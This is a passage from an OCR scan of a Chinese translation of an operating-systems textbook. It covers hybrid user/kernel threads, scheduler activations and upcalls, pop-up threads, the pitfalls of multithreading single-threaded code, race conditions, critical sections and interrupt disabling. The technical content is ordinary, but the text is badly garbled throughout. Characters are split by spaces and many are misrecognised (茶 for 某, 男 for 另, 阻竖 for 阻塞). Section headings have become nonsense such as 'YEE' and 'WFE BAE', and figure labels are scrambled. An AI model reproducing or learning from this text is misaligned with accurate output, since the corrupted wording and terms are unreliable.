程序 ， 或 许 一 个 线程 是 正确 的 选择 ， 但 是 如 果 它 继续 执行 ， 则 应 该 复制 
所 有 的 线程 。 

















另 一 个 话题 是 信号 。 回 忆 一 下 ， 信 和 号 是 发 给 进程 而 不 是 线程 的 ， 至 
少 在 经 典 模 型 中 是 这 样 的 。 当 一 个 信号 到 达 时 ， 应 该 由 哪 一 个 线程 处 理 
它 ? 线程 可 以 “注册 ”它们 感 兴趣 的 茶 些 信和 号， 因此 当 一 个 信号 到 达 的 时 
候 ， 可 把 它 交 给 需要 它 的 线程 。 但 是 如 果 两 个 或 更 多 的 线程 注册 了 相同 





的 信号 ， 会 发 生 什么 ? 这 只 是 线程 引起 的 问题 中 的 两 个 ， 但 是 还 有 更 多 


的 问题 。 


2.2.6 YEE 


人 们 已 经 研究 了 各 种 试图 将 用 户 级 线程 的 优点 和 内 核 级 线程 的 优点 
结合 起 来 的 方法 。 一 种 方法 是 使 用 内 核 级 线程 ， 然 后 将 用 户 级 线程 与 某 
些 或 者 全 部 内 核 线程 多 路 复 用 起 来 ， 如 图 2-17 所 示 。 如 末末 用 这 种 方 
法 ， 编 程 人 员 可 以 决定 有 多 少 个 内 核 级 线程 和 多 少 个 用 户 级 线程 彼此 多 
路 复 用 。 这 一 异型 带 来 最 大 的 灵活 度 。 








多 用 户 线程 对 应 一 个 内 核 线程 





图 2-17 用 户 级 线程 与 内 核 线 程 多 路 复 用 


采用 这 种 方法 ， 内 核 只 识别 内 核 级 线程 ， 并 对 其 进行 调度 。 其 中 一 
些 内 核 级 线程 会 被 多 个 用 户 级 线程 多 路 复 用 。 如 同 在 没有 多 线程 能 力 操 
作 系 统 中 东 个 进程 中 的 用 户 级 线程 一 样 ， 可 以 创建 、 撤 销 和 调度 这 些 用 


户 级 线程 。 在 这 种 模型 中 ， 每 个 内 核 级 线程 有 一 个 可 以 轮流 使 用 的 用 户 
级 线程 集合 。 


2.2.7 ”调度 程序 激活 机 制 


尽管 内 核 级 线程 在 一 些 关 键 点 上 优 于 用 户 级 线程 ， 但 无 可 争议 的 是 
内 核 级 线程 的 速度 慢 。 因 此 ， 研 究 人 员 一 直 在 寻找 在 保持 其 优良 特性 的 
前 提 下 改进 其 速度 的 方法 。 下 面 我 们 将 介绍 Anderson 等 人 《〈1992) 设计 
的 这 样 一 种 方法 ， 称 为 调度 程序 激活 (scheduler activation) 机 制 。Edler 
等 人 (1988) 以 及 Scott 等 人 (1990) 就 相关 的 工作 进行 了 深入 讨论 。 


调度 程序 激活 工作 的 目标 是 模拟 内 核 线 程 的 功能 ， 但 是 为 线程 包 提 
供 通 第 在 用 户 空间 中 才能 实现 的 更 好 的 性 能 和 更 大 的 灵活 性 。 特 别 地 ， 
如 果 用 户 线程 从 事 茶 种 系统 调用 时 是 安全 的 ， 那 就 不 应 该 进行 专门 的 非 
阻 竖 调用 或 者 进行 提前 检查 。 无 论 如 何 ， 如 果 线 程 阻 竖 在 茶 个 系统 调用 
或 页 面 故 障 上 ， 只 要 在 同一 个 进程 中 有 任何 就 绪 的 线程 ， 就 应 该 有 可 能 


运行 其 他 的 线程 。 











由 于 避免 了 在 用 户 空 间 和 内 核 空间 之 间 的 不 必要 转换 ， 从 而 提高 
效率 。 例 如 ， 如 条 茶 个 线程 由 于 等 待 妃 一 个 线程 的 工作 而 阻 寨 ， 此 时 没 
有 理由 请 求 内 核 ， 这 样 就 减少 了 内 核 -用 户 转 换 的 开销 。 用 户 空 间 的 运 
行 时 系统 可 以 阻 窗 同步 的 线程 而 男 外 调度 一 个 新 线程 。 





当 使 用 调度 程序 激活 机 制 时 ， 内 核 给 每 个 进程 安排 一 定数 量 的 虚拟 
处 理 器 ， 并 且 让 《用 户 空 间 ) 运行 时 系统 将 线程 分 配 到 处 理 器 上 。 这 一 





机 制 也 可 以 用 在 多 处 理 喜 中 ， 此 时 虚拟 处 理 需 可 能 成 为 真实 的 CPU。 分 
配给 一 个 进程 的 虚拟 处 理 器 的 初始 数量 是 一 个 ， 但 是 该 进程 可 以 申请 更 
多 的 处 理 嚣 并且 在 不 用 时 退回 。 内 核 也 可 以 取 回 已 经 分 配 出 去 的 虚拟 处 
理 嚣 ， 以 便 把 它们 分 给 需要 更 多 处 理 占 的 进程 。 


使 该 机 制 工 作 的 基本 思路 是 ， 当 内 核 了 解 到 一 个 线程 被 阻塞 之 后 
(例如 ， 由 于 执行 了 一 个 阻塞 系统 调用 或 者 产生 了 一 个 页 面 故障 ) ， 内 
核 通知 该 进程 的 运行 时 系统 ， 并 且 在 堆栈 中 以 参数 形式 传递 有 问题 的 线 
程 编 号 和 所 发 生 事件 的 一 个 描述 。 内 核 通过 在 一 个 已 知 的 起 始 地 址 启动 
运行 时 系统 ， 从 而 发 出 了 通知 ， 这 是 对 UNIX 中 信号 的 一 种 粗略 模拟 。 
这 个 机 制 称 为 上 行 调用 (Cupcall) 。 


一 旦 如 此 激活 ， 运 行 时 系统 就 重新 调度 其 线程 ， 这 个 过 程 通常 是 
样 的 : 把 当前 线程 标记 为 阻塞 并 从 就 绪 表 中 取出 另 一 个 线程 ， 设 置 其 寄 
存 器 ， 然 后 再 局 动 之 。 稍 后 ， 当 内 核 知 道 原来 的 线程 又 可 运行 时 《〈 例 
如 ， 原 移 试 图 读 取 的 管道 中 有 了 数据 ， 或 者 已 经 从 磁盘 中 读 入 了 故障 的 
页 面 ) ， 内 核 就 又 一 次 上 行 调用 运行 时 系统 ， 通 知 它 这 一 事件 。 此 时 该 
运行 时 系统 按照 自己 的 判断 ， 或 者 立即 重启 动 被 阻塞 的 线程 ， 或 者 把 它 
放 入 就 绪 表 中 稍 后 运行 


这 








在 东 个 用 户 线 程 运 行 的 同时 发 生 一 个 硬件 中 断 时 ， 被 中 断 的 CPU 切 
换 进 核心 态 。 如 果 和 被 中 断 的 进程 对 引起 该 中 断 的 事件 不 感 兴趣 ， 比 如 ， 
古 男 一 个 进程 的 VO 完成 了 ， 那 么 在 中 断 处 理 程序 结束 之 后 ， 就 把 被 中 





盯 的 线程 恢复 到 中 断 之 前 的 状态 。 不 过 ， 如 果 访 进程 对 中 断 感 兴趣 ， 比 
如 ， 征 该 进程 中 的 茶 个 线程 所 再 要 的 页 面 到 达 了 ， 那 么 被 中 断 的 线程 就 
不 再 局 动 ， 代 之 为 挂 起 被 中 断 的 线程 。 而 运行 时 系统 则 局 动 对 应 的 虚拟 
CPU， 此 时 被 中 断 线程 的 状态 保存 在 堆栈 中 。 随 后 ， 运 行 时 系统 决定 在 
该 CPU 上 调度 哪个 线程 :被 中 断 的 线程 、 新 就 绪 的 线程 还 是 茶 个 第 三 种 
选择 。 








调度 程序 激活 机 制 的 一 个 目标 是 作为 上 行 调用 的 信赖 基础 ， 这 是 一 
种 违反 分 层次 系统 内 在 结构 的 概念 。 通 常 ，n 层 提供 n+1 层 可 调用 的 特定 
服务 ， 但 是 n 层 不 能 调用 n+1 层 中 的 过 程 。 上 行 调用 并 不 遵守 这 个 基本 原 
Hi 





2.2.8 ”弹出 式 线程 


在 分 布 式 系 统 中 经 常 使 用 线程 。 一 个 有 意义 的 例子 是 如 何 处 理 到 来 
的 消 妃 ， 例 如 服务 请 求 。 传 统 的 方法 是 将 进程 或 线程 阻 赛 在 一 个 receive 
系统 调用 上 ， 等 竺 消息 到 来 。 当 消息 到 达 时 ， 该 系统 调用 接收 消 轧 ， 并 
打开 消息 检查 其 内 容 ， 然 后 进行 处 理 。 








不 过 ， 也 可 能 有 为 一 种 完全 不 同 的 处 理 方 式 ， 在 该 处 理 方式 中 ， 一 
个 消息 的 到 达 导 致 系统 创建 一 个 处 理 该 消息 的 线程 ， 这 种 线程 称 为 弹出 
式 线程 ， 如 图 2-18 所 示 。 弹 出 式 线 程 的 关键 好 处 是 ， 由 于 这 种 线程 相当 
新 ， 没 有 历史 一 一 没有 必须 存储 的 寄存 占 、 堆 栈 诸如 此 类 的 内 容 ， 每 个 
线程 从 全 新 开始 ， 每 一 个 线程 彼此 之 间 都 完全 一 样 。 这 样 ， 就 有 可 能 快 
速 创 建 这 类 线程 。 对 该 新 线程 指定 所 要 处 理 的 消 轧 。 使 用 弹出 式 线 程 的 
结果 是 ， 消 息 到 达 与 处 理 开始 之 间 的 时 间 非 常 短 。 





进程 弹出 式 线程 : 为 控制 
现存 线程 到 达 的 消息 而 创建 








到 达 的 消息 





网 络 
a) m 
图 2-18 在 消息 到 达 时 创建 一 个 新 的 线程 : 四 消息 到 达 之 前 ; DAS 


到 达 之 后 


在 使 用 弹出 式 线程 之 前 ， 需 要 提前 进行 计划 。 例 如 ， 哪 个 进程 中 的 
线程 先 运行 ? 如果 系统 文 持 在 内 核 上 下 文中 运行 线程 ， 线 程 就 有 可 能 在 
那里 运行 《这 是 图 2-18 中 没有 画 出 内 核 的 原因 ) 。 在 内 核 空 间 中 运行 弹 
出 式 线程 通常 比 在 用 户 空间 中 容易 且 快 捷 ， 而 且 内 核 空 间 中 的 弹出 式 线 
程 可 以 很 容易 访问 所 有 的 表格 和 LO 设备 ， 这 些 也 许 在 中 断 处 理 时 有 
用 。 而 男 一 方面 ， 出 错 的 内 核 线 程 会 比 出 错 的 用 户 线程 造成 更 大 的 损 
害 。 例 如 ， 如 果 东 个 线程 运行 时 间 太 长 ， 叉 没有 办 法 抢占 它 ， 就 可 能 造 
成 进来 的 信息 丢失 。 











2.2.9 ”使 单线 程 代码 多 线程 化 





许多 已 有 的 程序 是 为 单线 程 进 程 编写 的 。 把 这 些 程 序 改写 成 多 线程 
需要 比 直 接 写 多 线程 程序 更 高 的 技巧 。 下 面 我 们 考察 一 些 其 中 易 犯 的 错 


‘oO 


WRo 





先 考察 代码 ， 一 个 线程 的 代码 束 像 进程 一 样 ， 通 常 包含 多 个 过 程 ， 
会 有 局 部 变量 、 全 局 变量 和 过 程 参 数 。 局 部 变量 和 参数 不 会 引起 任何 问 
题 ， 但 是 有 一 个 问题 是 ， 对 线程 而 言 是 全 局 变量 ， 并 不 是 对 整个 程序 也 
征 全 局 的 。 有 许多 变量 之 所 以 是 全 局 的 ， 是 因为 线程 中 的 许多 过 程 都 使 
用 它们 (如 同 它们 也 可 能 使 用 任何 全 局 变量 一 样 )， 但 是 其 他 线程 在 逻 
辑 上 和 这 些 变 量 无 大 。 














作为 一 个 例子 ， 考 虑 由 UNIX 维 护 的 ermo 变 量 。 当 进程 〈 或 线程 ) 
进行 系统 调用 失败 时 ， 错 误 码 会 放 入 errno。 在 图 2-19 中 ， 线 程 1 执 行 系 
统 调用 access 以 确定 是 否 允 许 它 访问 茶 个 特定 文件 。 操 作 系 统 把 返回 值 
放 到 全 局 变量 errno 里 。 当 控制 权 返 回 到 线程 1 之 后 ， 并 在 线程 1 读 取 
errno 之 前 ， 调 度 程序 确认 线程 1 此 刻 已 用 完 CPU 时 间 ， 并 决定 切换 到 线 
程 2。 线 程 2 执行 一 个 open 调 用 ， 结 果 失 败 ， 导 致 重 写 errno， 于 是 给 线程 
1 的 返回 值 会 永远 丢失 。 随 后 在 线程 1 执行 时 ， 它 将 读 取 错 误 的 返回 值 并 
导致 错误 操作 。 


线程 1 线程 2 


存 取 (〈errno 设 置 ) 


Eap 


打开 (errno 重 写 ) 


-一 时 间 


检查 到 的 errno 


图 2-19 线程 使 用 全 局 变量 所 引起 的 错误 


对 于 这 个 问题 有 各 种 解决 方案 。 一 种 解决 方案 是 全 面 禁止 全 局 变 
量 。 不 过 这 个 想法 不 一 定 合 适 ， 因 为 它 同 许多 已 有 的 软件 冲突 。 男 一 种 
笃 决 方案 是 为 每 个 线程 赋予 其 私有 的 全 局 变量 ， 如 图 2-20 所 示 。 在 这 个 
方案 中 ， 每 个 线程 有 自己 的 ermo 以 及 其 他 全 局 变量 的 私有 副本 ， 这 样 就 
避 免 了 冲突 。 在 效果 上 ， 这 个 方案 创建 了 新 的 作用 域 屋 ， 这 些 变 量 对 一 
个 线程 中 所 有 过 程 都 是 可 见 的 。 而 在 原先 的 作用 域 层 里 ， 变 量 只 对 一 个 
过 程 可 见 ， 并 在 程序 中 处 处 可 见 。 


a 


线程 1 的 代码 


线程 2 的 代码 

线程 1 的 堆栈 

线程 2 的 堆栈 
线程 1 的 全 局 变量 
线程 2 的 全 局 变量 





图 2-20 线程 可 拥有 私有 的 全 局 变量 








访问 私有 的 全 局 变量 需要 有 些 技 巧 ， 不 过 ， 多 数 程序 设计 语言 具有 
表示 局 部 变量 和 全 局 变量 的 方式 ， 而 没有 中 间 的 形式 。 有 可 能 为 全 局 变 
量 分 配 一 块 内 存 ， 并 将 它 转送 给 线程 中 的 每 个 过 程 作为 额外 的 参数 。 尽 
管 这 不 是 一 个 漂 腕 的 方案 ， 但 却 是 一 个 可 用 的 方案 。 








> 


还 有 为 一 种 方案 ， 可 以 引入 新 的 库 过 程 ， 以 便 创 建 、 设 置 和 读 取 这 
些 线程 范围 的 全 局 变量 。 首 先 一 个 调用 也 许 是 这 样 的 : 








create gl obal ("bufptr") ; 





该 调用 在 堆 上 或 在 专门 为 调用 线程 所 保留 的 特殊 存储 区 上 和 蔡 一 个 名 


为 bufptr 的 指针 分 配 存 储 空间 。 无 论 该 存储 空间 分 配 在 何 处 ， 只 有 调用 
线程 才 可 访问 其 全 局 变量 。 如 宁 另 一 个 线程 创建 了 同名 的 全 局 变量 ， 由 
于 它 在 不 同 的 存储 单元 上 ， 所 以 不 会 与 已 有 的 那个 变量 产生 冲突 。 











访问 全 局 变量 需要 两 个 调用 : 一 个 用 于 写 入 全 局 变量 ， 另 一 个 用 于 
读 取 全 局 变量 。 对 于 号 入 ， 类 似 有 





set global ("bufptr", &buf); 

















它 把 指针 的 值 保 存在 先前 通过 调用 create_global 创 建 的 存储 单元 
中 。 如 果 要 读 出 一 个 全 局 变量 ， 调 用 的 形式 类 似 于 








bufptr=read global ("bufptr"); 








这 个 调用 返回 一 个 存储 在 全 局 变量 中 的 地 址 ， 这 样 就 可 以 访问 其 中 
的 数据 了 。 





试图 将 单一 线程 程序 转 为 多 线程 程序 的 为 一 个 问题 是 ， 有 许多 库 过 
程 并 不 是 可 重 入 的 。 也 就 是 说 ， 它 们 不 是 被 设计 成 下 列 工 作 方式 的 : 对 
于 任何 给 定 的 过 程 ， 当 前 面 的 调用 尚 没有 结束 之 前 ， 可 以 进行 第 二 次 调 
用 。 例 如 ， 可 以 将 通过 网 络 发 送 消 乱 恰 当地 设计 为 ， 在 库 内 部 的 一 个 固 
定 缓冲 区 中 进行 消 妃 组 合 ， 然 后 陷入 内 核 将 其 发送 。 但 是 ， 如 果 一 个 线 
程 在 缓冲 区 中 编 好 了 消息 ， 然 后 被 时 钟 中 断 强 迫切 换 到 第 二 个 线程 ， 而 
第 二 个 线程 立即 用 它 自 己 的 消息 重 写 了 该 缓冲 区 ， 那 会 怎样 呢 ? 








类 似 地 还 有 内 存 分 配 过 程 ， 例 如 UNIX 中 的 malloc， 它 维护 着 内 存 
使 用 情况 的 关键 表格 ， 如 可 用 内 存 块 链 表 。 在 malloc 忙 于 更 新 表格 时 ， 
有 可 能 暂时 处 于 一 种 不 一 致 的 状态 ， 指 针 的 指向 不 定 。 如 果 在 表格 处 于 
一 种 不 一 致 的 状态 时 发 生 了 线程 切换 ， 并 且 从 一 个 不 同 的 线程 中 来 了 一 
个 新 的 调用 ， 融 可 能 会 由 于 使 用 了 一 个 无 效 指针 从 而 导致 程序 月 渍 。 要 
有 效 的 解决 所 有 这 些 问 题 意味 着 重 写 整个 库 。 做 这 件 事 并 非 是 无 效 的 行 
为 。 
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二 进 制 位 从 而 标志 茶 个 库 处 于 使 用 中 。 在 先前 的 调用 还 没有 完成 之 
前 ， 任 何 试图 使 用 该 库 的 其 他 线程 都 会 被 阻塞 。 尽管 这 个 方式 可 以 工 
， 但 是 它 会 极 大 地 降低 系统 潜在 的 并 行 性 。 
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接着 考虑 信号 。 有 些 信和 号 逻辑 上 是 线程 专用 的 ， 但 是 另 一 些 却 不 
是 。 例 如 ， 如 果 某 个 线程 调用 alarm， 信 和 号 送 往 进行 该 调用 的 线程 是 有 
意义 的 。 但 是 ， 当 线程 完全 在 用 户 空 间 实 现时 ， 内 核 根 本 不 知道 有 线程 
存在 ， 因 此 很 难 将 信号 发 送 给 正确 的 线程 。 如 果 一 个 进程 一 次 仅 有 一 个 
警报 信号 等 待 处 理 ， 而 其 中 的 多 个 线程 又 独立 地 调用 alarm， 那 么 情况 
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有 些 信 号 ， 如 键盘 中 断 ， 则 不 是 线程 专用 的 。 谁 应 该 捕捉 它们 ? 一 
个 指定 的 线程 ? 所 有 的 线程 ? 还 是 新 创建 的 弹出 式 线 程 ? 进而 ， 如 果 某 
个 线程 修改 了 信和 号 处 理 程 序 ， 而 没有 通知 其 他 线程 ， 会 出 现 什么 情况 ? 


如 果 某 个 线程 想 捕捉 一 个 特定 的 信号 《〈 比 如， 用 户 击 键 CTRL+C) ， 而 
另 一 个 线程 却 想 用 这 个 信号 终止 进程 ， 又 会 发 生 什 么 情况 ? 如 果 有 一 个 
或 多 个 线程 运行 标准 的 库 过 程 以 及 其 他 用 户 编 写 的 过 程 ， 那 么 情况 还 
更 复杂 。 很 显然 ， 这 些 想 法 是 不 兼容 的 。 一 般 而 言 ， 在 单线 程 的 环境 中 
信号 已 经 是 很 难 管理 的 了 ， 到 了 多 线程 环境 中 并 不 会 使 这 一 情况 变 得 容 
易 处 理 。 


由 多 线程 引入 的 最 后 一 个 问题 是 堆栈 的 管理 。 在 很 多 系统 中 ， 当 一 
个 进程 的 堆栈 洲 出 时 ， 内 核 只 是 目 动 为 该 进程 提供 更 多 的 堆栈 。 当 一 个 
进程 有 多 个 线程 时 ， 就 必须 有 多 个 堆栈 。 如 果 内 核 不 了 解 所 有 的 堆栈 ， 
就 不 能 使 它们 目 动 增长 ， 直 到 造成 堆栈 出 错 。 事 实 上 ， 内 核 有 可 能 还 
有 意识 到 内 存 错 是 和 茶 个 线程 栈 的 增长 有 关系 的 。 


这 些 问 题 当 然 不 是 不 可 克服 的 ， 但 是 却说 明了 给 已 有 的 系统 引入 线 
程 而 不 进行 实质 性 的 重新 设计 系统 是 根本 不 行 的 。 至 少 可 能 需要 重新 定 
义 系统 调用 的 语义 ， 并 且 不 得 不 重 写 库 。 而 且 所 有 这 些 工作 必须 与 在 一 
个 进程 中 有 一 个 线程 的 原 有 程序 向 后 兼容 。 有 关 线 程 的 其 他 信息 ， 可 以 
参阅 (Hauser 等 人 ，1993; Marsh 等 人 ，1991) 。 














2.3 WFE BAE 


进程 经 常 需要 与 其 他 进程 通信 。 例 如 ， 在 一 个 shell 管 道中 ， 第 一 个 
进程 的 输出 必须 传送 给 第 二 个 进程 ， 这 样 沿 着 管道 传递 下 去 。 因 此 在 进 
程 之 间 需 要 通信 ， 而 且 最 好 使 用 一 种 结构 恨 好 的 方式 ， 不 要 使 用 中 断 。 
在 下 面 几 节 中 ， 我 们 就 来 讨论 一 些 有 关 进 程 间 通信 (nter Process 


Communication, IPC) 的 问题 。 





简要 地 说 ， 有 三 个 问题 。 第 一 个 问题 与 上 面 的 叙述 有 关 ， 即 一 个 进 
程 如 何 把 信息 传递 给 另 一 个 。 第 二 个 要 处 理 的 问题 是 ， 确 保 两 个 或 更 多 
的 进程 在 关键 活动 中 不 会 出 现 交 又 ， 例 如， 在 飞机 订 肝 系统 中 的 两 个 进 
程 为 不 同 的 客户 试图 争 守 飞机 上 的 最 后 一 个 座位 。 第 三 个 问题 与 正确 的 
顺序 有 关 《〈 如 果 该 顺序 是 有 关联 的 话 ) ， 比 如 ， 如 果 进 程 A 产 生 数 据 而 
进程 B 打 印 数据 ， 那 么 B 在 打印 之 前 必须 等 待 ， 直 到 A 已 经 产生 一 些 数 
据 。 我 们 将 从 下 一 节 开 始 考察 所 有 这 三 个 问题 。 








有 必要 说 明 ， 这 三 个 问题 中 的 两 个 问题 对 于 线程 来 说 是 同样 适用 
的 。 第 一 个 问题 ( 即 传递 信息 〉 对 线程 而 言 比较 容易 ， 因 为 它们 共 至 一 
个 地 址 空间 (在 不 同 地 址 空间 需要 通信 的 线程 属于 不 同 进程 之 间 的 通信 
情形 ) 。 但 是 另外 两 个 问题 〈 需 要 梳理 清楚 并 保持 恰当 的 顺序 ) 同样 适 
用 于 线程 。 同 样 的 问题 可 用 同样 的 方法 解决 。 下 面 开始 讨论 进程 间 通 信 
的 问题 ， 不 过 请 记 住 ， 同 样 的 问题 和 解决 方法 也 适用 于 线程 。 

















2.3.1 RAE 


在 一 些 操 作 系统 中 ， 协 作 的 进程 可 能 共享 一 些 彼此 都 能 读 写 的 公用 
存储 区 。 这 个 公用 存储 区 可 能 在 内 存 中 《可 能 是 在 内 核 数 据 结构 中 ) ， 
也 可 能 是 一 个 共 译文 件 。 这 里 共 至 存储 区 的 位 置 并 不 影响 通信 的 本 质 及 
其 带 来 的 问题 。 为 了 理解 实际 中 进程 间 通 信 如 何 工 作 ， 我 们 考虑 一 个 简 
单 但 很 普 遇 的 例子 : 一 个 假 脱 机 打印 程序 。 当 一 个 进程 需要 打印 一 个 文 
件 时 ， 它 将 文件 名 放 在 一 个 特殊 的 假 胶 机 目录 Cspooler directory) 下 。 
为 一 个 进程 (打印 机 守护 进程 》 则 周期 性 地 检查 是 否 有 文件 需要 打印 ， 
大 有 就 打印 并 将 该 文件 名 从 目录 下 删 掉 。 














设想 假 脱 机 目录 中 有 许多 槽 位 ， 编 号 依次 为 0，1，2，.…， 每 个 覃 
位 存放 一 个 文件 名 。 同 时 假设 有 两 个 共享 变量 : out， 指 癌 下 一 个 要 打 
印 的 文件 ，in， 指 癌 目录 中 下 一 个 空 用 槽 位 。 可 以 把 这 两 个 变量 保存 在 
一 个 所 有 进程 都 能 访问 的 文件 中 ， 该 文件 的 长 度 为 两 个 字 。 在 某 一 时 
刻 ，0 号 至 3 号 槽 位 空 〈《 其 中 的 文件 已 经 打印 完毕 ) ，4 号 至 6 号 槽 位 被 占 
用 《其 中 存 有 排 好 队列 的 要 打印 的 文件 名 ) 。 几 乎 在 同一 时 刻 ， 进 程 A 
和 进程 B 痢 决定 将 一 个 文件 排队 打印 ， 这 种 情况 如 图 2-21 所 示 。 














假 脱 机 目录 


out=4 





图 2-21 两 个 进程 同时 想 访问 共享 内 存 


在 Murphy 法 则 (任何 可 能 出 错 的 地 方 终 将 出 错 ) 生效 时 ， 可 能 发 
生 以 下 的 情况 。 进 程 A 读 到 in 的 值 为 7， 将 7 存在 一 个 局 部 变量 
next_free_slot 中 。 此 时 发 生 一 次 时 钟 中 断 ，CPU 认 为 进程 A 已 运行 了 足 
够 长 的 时 间 ， 决 定 切 换 到 进程 B。 进 程 B 也 读 取 in， 同 样 得 到 值 为 7， 于 
是 将 7 存在 B 的 局 部 变量 next_free_slot 中 。 在 这 一 时 刻 两 个 进程 都 认为 下 


一 个 可 用 权 位 是 7。 





进程 B 现 在 继续 运行 ， 它 将 其 文件 名 存在 槽 位 7 中 并 将 训 的 值 更 新 为 
8。 然 后 它 离开 ， 继 续 执 行 其 他 操作 。 


最 后 进程 A 接着 从 上 次 中 断 的 地 方 再 次 运行 。 它 检查 变量 








next_free_slot， 发 现 其 值 为 7， 于 是 将 打印 文件 名 存 入 7 号 槽 位 ， 这 样 就 
把 进程 B 存 在 那里 的 文件 名 覆盖 挤 。 然 后 它 将 next_free_slot 加 1， 得 到 值 
为 8， 束 将 8 存 到 加 中 。 此 时 ， 假 脱 机 目录 内 部 是 一 致 的， 所 以 打印 机 守 
护 进程 及 现 不 了 任何 错误 ， 但 进程 B 却 永远 得 不 到 任何 打印 输出 。 类 似 
这 样 的 情况 ， 即 两 个 或 多 个 进程 读 写 某 些 共 至 数据 ， 而 最 后 的 结果 取决 
于 进程 运行 的 精确 时 序 ， 称 为 竞争 条 件 〈race condition) 。 调 试 包含 有 
竞争 条 件 的 程序 是 一 件 很 头痛 的 事 。 大 多 数 的 测试 运行 结果 都 很 好 ， 但 
在 极 少数 情况 下 会 发 生 一 些 无 法 解释 的 奇怪 现象 。 











2.3.2 | 临界 区 


怎样 避免 苋 争 条 件 ? 实 际 上 凡 涉及 共享 内 存 、 共 享 文件 以 及 共 至 任 
何 资源 的 情况 都 会 引 友 与 前 面 类 似 的 错误 ， 要 避免 这 种 错误 ， 关 键 是 要 
找 出 茶 种 途径 来 阻止 多 个 进程 同时 读 写 共 宇 的 数据 。 换 言 之 ， 我 们 需 
[xe 4. (mutual exclusion) ， 即 以 茶 种 手段 确保 当 一 个 进程 在 使 用 一 
个 共 至 变量 或 文件 时 ， 其 他 进程 不 能 做 同样 的 操作 。 前 述 问 题 的 症结 就 
在 于 ， 在 进程 A 对 共有 至 变量 的 使 用 未 结束 之 前 进程 B 就 使 用 它 。 为 实现 
互 斥 而 选择 适当 的 原 语 是 任何 操作 系统 的 主要 设计 内 容 之 一 ， 也 是 我 们 
在 后 面 儿 市 中 要 详细 讨论 的 主题 。 








避免 竞争 条 件 的 问题 也 可 以 用 一 种 抽象 的 方式 进行 描述 。 一 个 进程 
的 一 部 分 时 间 做 内 部 计算 或 另外 一 些 不 会 引发 竞争 条 件 的 操作 。 在 某 些 
时 候 进 程 可 能 需要 访问 共享 内 存 或 共享 文件 ， 或 执行 另外 一 些 会 导致 竞 
争 的 操作 。 我 们 把 对 共享 内 存 进 行 访问 的 程序 片段 称 作 临 界 区 域 
(critical region) 或 临界 区 (critical section〉。 如 果 我 们 能 够 适当 地 安 
排 ， 使 得 两 个 进程 不 可 能 同时 处 于 临界 区 中 ， 就 能 够 避免 竞争 条 件 。 

















尽管 这 样 的 要 求 避免 了 竞争 条 件 ， 但 它 还 不 能 保证 使 用 共享 数据 的 
并 发 进程 能 够 正确 和 高 效 地 进行 协作 。 对 于 一 个 好 的 解决 方案 ， 需 要 满 
足以 下 4 个 条 件 : 





1) 任 何 两 个 进程 不 能 同时 处 于 其 临界 区 。 

2) 不 应 对 CPU 的 速度 和 数量 做 任何 假设 。 

3) 临 界 区 外 运行 的 进程 不 得 阻塞 其 他 进程 。 

4) 不 得 使 进程 无 限期 等 待 进入 临界 区 。 

从 抽象 的 角度 看 ， 我 们 所 希望 的 进程 行为 如 图 2-22 所 示 。 图 2-22 中 
进程 A 在 Ti 时 刻 进入 临界 区 。 稍 后 ， 在 T, 时 刻 进程 B 试 图 进入 临界 区 ， 
但 是 失败 了 ， 因 为 另 一 个 进程 已 经 在 该 临界 区 内 ， 而 一 个 时 刻 只 允许 一 
个 进程 在 临界 区 内 。 随 后 ，B 被 暂时 挂 起 直到 Ts 时 刻 A 离 开 临 界 区 为 


止 ， 从 而 允许 B 立 即 进 入 。 最 后 ，B 离 开 〈 在 时 刻 T4 ) ， 回 到 了 在 临界 
区 中 没有 进程 的 原始 状态 。 


A 进 入 临界 区 


IE 


A 离开 临界 区 


| | 

| B 试 图 进入 | | 

| 1 临界 区 。 ，B 进 入 临界 区 | B 离 开 临 界 区 

; , | 
a a a a ae 

| | eh | | 
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图 2-22 使 用 临界 区 的 互 斥 


2.3.3“” 忙 等 待 的 互 斥 








本 节 将 讨论 几 种 实现 互 斥 的 方案 。 在 这 些 方案 中 ， 当 一 个 进程 在 临 
界 区 中 更 新 共 孚 内 存 时 ， 其 他 进程 将 不 会 进入 其 临界 区 ， 也 不 会 带 来 任 
{A RIT o 
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在 单 处 理 器 系统 中 ， 最 简单 的 方法 是 使 每 个 进程 在 刚刚 进入 临界 区 
后 立即 屏蔽 所 有 中 断 ， 并 在 就 要 离开 之 前 再 打开 中 断 。 屏 蔽 中 断后 ， 时 
钟 中 断 也 被 屏蔽 。CPU 只 有 发 生 时 钟 中 断 或 其 他 中 断 时 才 会 进行 进程 切 
换 ， 这 样 ， 在 屏蔽 中 断 之 后 CPU 将 不 会 被 切换 到 其 他 进程 。 于 是 ， 一 且 
某 个 进程 屏蔽 中 断 之 后 ， 它 束 可 以 检查 和 修改 共 至 内 存 ， 而 不 必 担 心 其 
他 进程 介入 。 











这 个 方案 并 不 好 ， 因 为 把 屏蔽 中 断 的 权力 交 给 用 户 进程 是 不 明智 
的 。 设 想 一 下 ， 邦 一 个 进程 屏蔽 中 断后 不 再 打开 中 断 ， 其 结果 将 会 如 
何 ? 整个 系统 可 能 会 因此 终止 。 而 且 ， 如 果 系 统 是 多 处 理 器 (有 两 个 或 
REEL MADERAS) ， 则 屏蔽 中 断 仅 仅 对 执行 disable 指 令 的 那个 CPU 有 
效 。 其 他 CPU 仍 将 继续 运行 ， 并 可 以 访问 共 胖 内 存 。 











另 一 方面 ， 对 内 核 来 说 ， 当 它 在 更 新 变量 或 列表 的 几 条 指令 期 间 将 





中 断 屏 向 是 很 方便 的 。 当 就 绪 进 程 队列 之 类 的 数据 状态 不 一 致 时 发 生 中 
断 ， 则 将 导致 范 争 条 件 。 所 以 结论 是 : 屏蔽 中 断 对 于 操作 系统 本 里 而 言 
征 一 项 很 有 用 的 技术 ， 但 对 于 用 户 进程 则 不 是 一 种 合适 的 通用 互 斥 机 

制 |。 








由 于 多 核心 片 的 数量 越 来 越 多 ， 即 使 在 低 端 PC 上 也 是 如 此 。 因 
此 ， 通 过 屏蔽 中 断 来 达到 互 斥 的 可 能 性 
减少 了 。 双 核 现 在 已 经 相当 普遍 ， 四 核 当前 在 高 端 机 器 中 存在 ， 而 且 我 
们 离 八 或 十 六 《〈 核 ) 也 不 久远 了 。 在 一 个 多 核 系 统 中 《例如 ， 多 处 理 器 
系统 ) ， 屏 责 一 个 CPU 的 中 断 不 会 阻止 其 他 CPU 干预 第 一 个 CPU 所 做 的 
操作 。 结 果 是 人 们 需要 更 加 复杂 的 计划 。 











2. 锁 变量 


作为 第 二 种 尝试 ， 可 以 寻找 一 种 软件 解决 方 采 。 设 想 有 一 个 共享 
